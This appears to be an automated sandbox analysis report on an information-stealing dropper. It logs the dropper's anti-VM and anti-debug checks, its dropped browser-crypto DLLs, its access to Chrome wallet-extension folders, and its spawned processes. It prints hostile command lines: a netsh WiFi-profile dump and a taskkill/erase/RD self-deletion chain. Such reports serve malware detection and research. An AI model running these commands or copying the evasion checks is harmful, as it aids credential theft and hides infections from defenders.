Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: chormuim.exe, 00000008.00000000.371044114.00000000029DD000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356697477.00000000029F7000.00000004.00000001.sdmp

Binary or memory string: SBIEDLL.DLL

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Show sources

Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Show sources

Source: C:\Users\user\AppData\Local\Temp\chormuim.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe TID: 6256	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe TID: 6020	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe

6_2_004019F0

Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep			graph_6-18092
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep			graph_4-15138

Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Dropped PE file which has not been started: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AnonFileApi.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Dropped PE file which has not been started: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DotNetZip.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Dropped PE file which has not been started: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\svchoste.exe

Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\	Jump to behavior

Source: Amcache.hve.29.dr	Binary or memory string: VMware
Source: Amcache.hve.29.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.29.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.29.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.29.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: chormuim.exe, 00000008.00000000.372742094.000000001B711000.00000004.00000001.sdmp	Binary or memory string: Win32_VideoController(Standard display types)VMwareO63ZKH6EWin32_VideoControllerZG8C8BN8VideoController120060621000000.000000-00089490234display.infMSBDAWG6VM9MFPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78Oin32p
Source: svchoste.exe, 00000004.00000002.329735600.00000000012BA000.00000004.00000020.sdmp, svchoste.exe, 00000004.00000002.329775240.0000000001312000.00000004.00000020.sdmp, WerFault.exe, 0000001D.00000002.397993752.0000026D6FEF9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.29.dr	Binary or memory string: VMware, Inc.me
Source: svchoste.exe, 00000004.00000002.329775240.0000000001312000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW,
Source: chormuim.exe, 00000008.00000002.407334729.0000000002AD1000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356819748.0000000002AD3000.00000004.00000001.sdmp, Info.txt.8.dr	Binary or memory string: VirtualMachine: False
Source: chormuim.exe, 00000008.00000000.370201907.0000000002691000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.371044114.00000000029DD000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356697477.00000000029F7000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.355408259.0000000002691000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.406228414.0000000002691000.00000004.00000001.sdmp	Binary or memory string: VirtualMachine:
Source: chormuim.exe, 00000008.00000000.359002218.000000001B711000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000003.350741840.000000001B717000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.408878521.000000001B711000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.372742094.000000001B711000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^:
Source: chormuim.exe, 00000008.00000000.356697477.00000000029F7000.00000004.00000001.sdmp	Binary or memory string: VMware`
Source: dll.exe, 00000005.00000002.303723799.00000000005A1000.00000004.00000020.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.29.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.29.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: chormuim.exe, 00000008.00000002.405581531.000000000081A000.00000004.00000020.sdmp	Binary or memory string: Win32_VideoController(Standard display types)VMwareO63ZKH6EWin32_VideoControllerZG8C8BN8VideoController120060621000000.000000-00089490234display.infMSBDAWG6VM9MFPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsZYHDS8ZN1:
Source: chormuim.exe, 00000008.00000000.370261870.00000000026F3000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: WerFault.exe, 0000001D.00000003.396906821.0000026D6E03A000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000002.397615188.0000026D6E03A000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWP
Source: chormuim.exe, 00000008.00000003.350741840.000000001B717000.00000004.00000001.sdmp	Binary or memory string: Win32_VideoController(Standard display types)VMwareO63ZKH6EWin32_VideoControllerZG8C8BN8VideoController120060621000000.000000-00089490234display.infMSBDAWG6VM9MFPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsZY
Source: chormuim.exe, 00000008.00000002.409089267.000000001B7AC000.00000004.00000001.sdmp	Binary or memory string: Win32_VideoController(Standard display types)VMwareO63ZKH6EWin32_VideoControllerZG8C8BN8VideoController120060621000000.000000-00089490234display.infMSBDAWG6VM9MFPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsZYHDS8ZNLMEMp
Source: chormuim.exe, 00000008.00000002.409089267.000000001B7AC000.00000004.00000001.sdmp	Binary or memory string: Win32_VideoController(Standard display types)VMwareO63ZKH6EWin32_VideoControllerZG8C8BN8VideoController120060621000000.000000-00089490234display.infMSBDAWG6VM9MFPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsZYHDS8ZN`8X
Source: Amcache.hve.29.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.29.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.29.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.29.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.29.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: chormuim.exe, 00000008.00000000.372980265.000000001B900000.00000004.00000010.sdmp	Binary or memory string: Win32_VideoController(Standard display types)VMwareO63ZKH6EWin32_VideoControllerZG8C8BN8VideoController120060621000000.000000-00089490234display.infMSBDAWG6VM9MFPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsZYHDS8ZNus
Source: Amcache.hve.29.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.29.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.29.dr	Binary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
Source: Amcache.hve.29.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: chormuim.exe, 00000008.00000000.362756816.000000001B900000.00000004.00000010.sdmp	Binary or memory string: Win32_VideoController(Standard display types)VMwareO63ZKH6EWin32_VideoControllerZG8C8BN8VideoController120060621000000.000000-00089490234display.infMSBDAWG6VM9MFPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsZYHDS8ZNC:\WT:

Source: C:\Users\user\AppData\Local\Temp\dll.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\svchoste.exe

Code function: 4_2_00B8B4E0 GetSystemInfo,

4_2_00B8B4E0

Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Code function: 4_2_00B743DF FindFirstFileExA,GetLastError,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,_strcpy_s,__invoke_watson,	4_2_00B743DF
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Code function: 4_2_00B90540 wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,	4_2_00B90540
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Code function: 4_2_00B8E640 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	4_2_00B8E640
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Code function: 4_2_00B8D360 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	4_2_00B8D360
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Code function: 4_2_00B8F6B0 FindFirstFileExW,	4_2_00B8F6B0

Source: C:\Users\user\AppData\Local\Temp\svchoste.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe

6_2_004019F0

Source: C:\Users\user\AppData\Local\Temp\svchoste.exe

Code function: 4_2_00B8C810 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

4_2_00B8C810

Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Code function: 4_2_00B896D0 mov eax, dword ptr fs:[00000030h]		4_2_00B896D0
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Code function: 4_2_00B8B750 mov eax, dword ptr fs:[00000030h]		4_2_00B8B750

Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\chormuim.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6504 -s 1360

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\svchoste.exe

Code function: 4_2_00B772E6 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

4_2_00B772E6

Source: C:\Users\user\AppData\Local\Temp\svchoste.exe

Code function: 4_2_00B8B160 GetCurrentHwProfileA,GetProcessHeap,HeapAlloc,lstrcat,

4_2_00B8B160

Source: C:\Users\user\AppData\Local\Temp\dll.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Code function: 4_2_00B772E6 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00B772E6
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Code function: 4_2_00B74354 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00B74354
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Code function: 4_2_00B7E5C7 SetUnhandledExceptionFilter,	4_2_00B7E5C7
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Code function: 6_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_0040CE09
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Code function: 6_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_0040E61C
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Code function: 6_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00416F6A
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Code function: 6_2_004123F1 SetUnhandledExceptionFilter,	6_2_004123F1

Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Process created: C:\Users\user\AppData\Local\Temp\svchoste.exe "C:\Users\user\AppData\Local\Temp\svchoste.exe"	Jump to behavior
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Process created: C:\Users\user\AppData\Local\Temp\dll.exe "C:\Users\user\AppData\Local\Temp\dll.exe"	Jump to behavior
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Process created: C:\Users\user\AppData\Local\Temp\chormuimii.exe "C:\Users\user\AppData\Local\Temp\chormuimii.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /pid 4648 & erase C:\Users\user\AppData\Local\Temp\svchoste.exe & RD /S /Q C:\\ProgramData\\216363876181815\\* & exit	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dll.exe	Process created: C:\ProgramData\AMD Driver\taskshell.exe "C:\ProgramData\AMD Driver\taskshell.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Process created: C:\Users\user\AppData\Local\Temp\chormuim.exe "C:\Users\user\AppData\Local\Temp\chormuim.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
